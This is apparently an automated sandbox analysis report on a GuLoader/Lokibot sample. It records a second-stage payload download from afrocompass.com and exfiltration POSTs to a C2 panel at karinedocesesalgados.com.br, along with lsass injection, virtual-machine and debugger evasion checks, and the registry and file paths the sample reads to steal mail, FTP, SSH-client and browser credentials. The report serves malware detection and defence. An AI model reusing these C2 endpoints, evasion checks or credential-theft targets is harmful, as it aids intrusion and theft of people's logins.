          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 14:29:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 14:29:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
          Source: 2GirCpksIO.exe, 00000005.00000003.6649688064.0000000000899000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6703150220.000001CE61A9B000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: 2GirCpksIO.exe, 00000005.00000003.6649688064.0000000000899000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6703150220.000001CE61A9B000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
          Source: lsass.exe, 0000000A.00000000.6712294981.000001CE61B74000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: lsass.exe, 0000000A.00000002.10832834638.000001CE614D0000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0F
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: UserOOBEBroker.exe, 00000004.00000002.10830879380.000001C6E8B00000.00000002.00020000.sdmpString found in binary or memory: http://schemas.microso
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmp, lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 0000000A.00000000.6718254573.000001CE61451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 0000000A.00000000.6701087559.000001CE6142F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
          Source: lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com
          Source: lsass.exe, 0000000A.00000002.10833511138.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/c
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/k
          Source: 2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin
          Source: 2GirCpksIO.exe, 00000005.00000002.10832026164.0000000000859000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin0;
          Source: 2GirCpksIO.exe, 00000005.00000002.10831731401.000000000082E000.00000004.00000020.sdmpString found in binary or memory: https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin_
          Source: 2GirCpksIO.exe, 00000005.00000002.10832583099.0000000000898000.00000004.00000020.sdmp, 2GirCpksIO.exe, 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmpString found in binary or memory: https://karinedocesesalgados.com.br/nedo/five/fre.php
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: 2GirCpksIO.exe, 00000005.00000003.6650584168.000000001E520000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: unknownHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 178Connection: close
          Source: unknownDNS traffic detected: queries for: afrocompass.com
          Source: global trafficHTTP traffic detected: GET /karinedocesesalgados_HpiSWwhaod1.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: afrocompass.comCache-Control: no-cache
          Source: unknownHTTPS traffic detected: 68.66.226.70:443 -> 192.168.11.20:49787 version: TLS 1.2

          System Summary:

          Potential malicious icon found
          Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
          Source: 2GirCpksIO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BE72
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BA6E
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D218A6
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1B688
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1F7F8
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1C399
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1E876
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1EC0A
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BE72 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1BA6E NtWriteVirtualMemory,CreateFileA,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D211D4 NtProtectVirtualMemory,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1F7F8 NtWriteVirtualMemory,LoadLibraryA,
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess Stats: CPU usage > 98%
          Source: 2GirCpksIO.exe, 00000001.00000002.6229227399.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exe, 00000005.00000000.6223816198.000000000041B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exeBinary or memory string: OriginalFilenameSORNER.exe vs 2GirCpksIO.exe
          Source: 2GirCpksIO.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\oobe\UserOOBEBroker.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: edgegdi.dll
          Source: 2GirCpksIO.exeVirustotal: Detection: 32%
          Source: 2GirCpksIO.exeReversingLabs: Detection: 20%
          Source: 2GirCpksIO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: unknownProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: unknownProcess created: C:\Windows\System32\oobe\UserOOBEBroker.exe C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: C:\Windows\System32\oobe\UserOOBEBroker.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InProcServer32
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@4/4@2/2
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

          Data Obfuscation:

          Yara detected GuLoader
          Source: Yara matchFile source: 00000005.00000000.6227819814.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.6231878648.0000000002D10000.00000040.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00407447 push esi; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004084D6 push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040688C pushfd ; iretd
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040856E push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00404572 push ecx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004091FD push ss; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040798C pushfd ; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004085A1 push ebp; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_004059BD pushad ; retf 0008h
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00405EA9 push edi; retf
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_0040937F push FFFFFFDFh; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00408325 push dword ptr [edi]; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00407B9F push esi; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00561EF5 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00561054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562854 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00564054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00567054 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565855 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566844 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00560843 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562043 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563843 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565043 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00562074 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563874 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00565074 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566875 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00560878 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00566065 push edx; ret
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_00563063 push edx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 6.86127779315
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion:

          Tries to detect Any.run
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\2GirCpksIO.exeFile opened: C:\Program Files\qga\qga.exe
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: 2GirCpksIO.exe, 00000001.00000002.6229518828.000000000057D000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEGK
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
          Source: 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://AFROCOMPASS.COM/KARINEDOCESESALGADOS_HPISWWHAOD1.BIN
          Source: C:\Users\user\Desktop\2GirCpksIO.exe TID: 400Thread sleep count: 103 > 30
          Source: C:\Users\user\Desktop\2GirCpksIO.exe TID: 400Thread sleep time: -6180000s >= -30000s
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread delayed: delay time: 60000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeSystem information queried: ModuleInformation
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicshutdownNT SERVICE
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicvssNT SERVICE
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicvss
          Source: 2GirCpksIO.exe, 00000001.00000002.6229518828.000000000057D000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exegk
          Source: 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://afrocompass.com/karinedocesesalgados_HpiSWwhaod1.bin
          Source: 2GirCpksIO.exe, 00000005.00000002.10832382957.0000000000883000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: lsass.exe, 0000000A.00000002.10832697101.000001CE614A8000.00000004.00000001.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
          Source: 2GirCpksIO.exe, 00000001.00000002.6231972388.0000000002D30000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834416803.0000000002420000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: 2GirCpksIO.exe, 00000001.00000002.6232028844.0000000002DF9000.00000004.00000001.sdmp, 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: 2GirCpksIO.exe, 00000005.00000002.10834466193.00000000024E9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
          Source: lsass.exe, 0000000A.00000000.6700942689.000001CE61413000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

          Anti Debugging:

          Hides threads from debuggers
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D202D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1EE31 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1B87D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D1E553 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\2GirCpksIO.exeCode function: 1_2_02D218A6 RtlAddVectoredExceptionHandler,

          HIPS / PFW / Operating System Protection Evasion:

          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory written: C:\Windows\System32\lsass.exe base: 1CE61340000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory written: C:\Windows\System32\lsass.exe base: 1CE622D0000
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CE61340000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\2GirCpksIO.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1CE622D0000 protect: page execute and read and write
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\2GirCpksIO.exeThread created: C:\Windows\System32\lsass.exe EIP: 61340000
          Source: C:\Users\user\Desktop\2GirCpksIO.exeProcess created: C:\Users\user\Desktop\2GirCpksIO.exe "C:\Users\user\Desktop\2GirCpksIO.exe"
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: PProgram Manager/
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: UserOOBEBroker.exe, 00000004.00000002.10832382850.000001C6E9220000.00000002.00020000.sdmp, 2GirCpksIO.exe, 00000005.00000002.10833760693.0000000000FE0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: C:\Users\user\Desktop\2GirCpksIO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Lokibot
          Source: Yara match; File source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: 2GirCpksIO.exe PID: 4560, type: MEMORYSTR
          GuLoader behavior detected
          Source: Initial file; Signature Results: GuLoader behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\2GirCpksIO.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality:

          Yara detected Lokibot
          Source: Yara match; File source: 00000005.00000003.6933085805.0000000000898000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: 2GirCpksIO.exe PID: 4560, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
